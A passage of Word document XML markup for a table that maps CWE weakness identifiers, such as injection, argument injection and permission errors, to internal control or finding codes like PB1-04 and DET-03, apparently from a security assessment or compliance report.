            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-682</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-09, PB1-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-692</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-693</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Protection Mechanism Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-03, DET-04, DET-06, DET-07, SEC-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-697</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Incorrect Comparison</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-703</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-13, CF-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-73</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-04, PB2-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-732</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Incorrect Permission Assignment for Critical Resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-74</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Neutralization of Special Elements in Output Used by a Downstream Component (Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-01, DET-02, DET-05, PB1-01, PB1-04, PB1-05, PB1-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-754</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Check for Unusual or Exceptional Conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-15, PB1-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-776</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-807</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-04, PB1-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-829</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Inclusion of Functionality from Untrusted Control Sphere</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-02, DEP-02, DEP-03, DEP-05, DEP-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-840</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-841</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-88</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Neutralization of Argument Delimiters in a Command (Argument Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-01, PB1-02, PB1-05, PB2-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Neutralization of Special Elements used in an LDAP Query (LDAP Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-915</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improperly Controlled Modification of Dynamically-Determined Object Attributes (Mass Assignment)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-93</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-943</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Improper Neutralization of Special Elements in Data Query Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
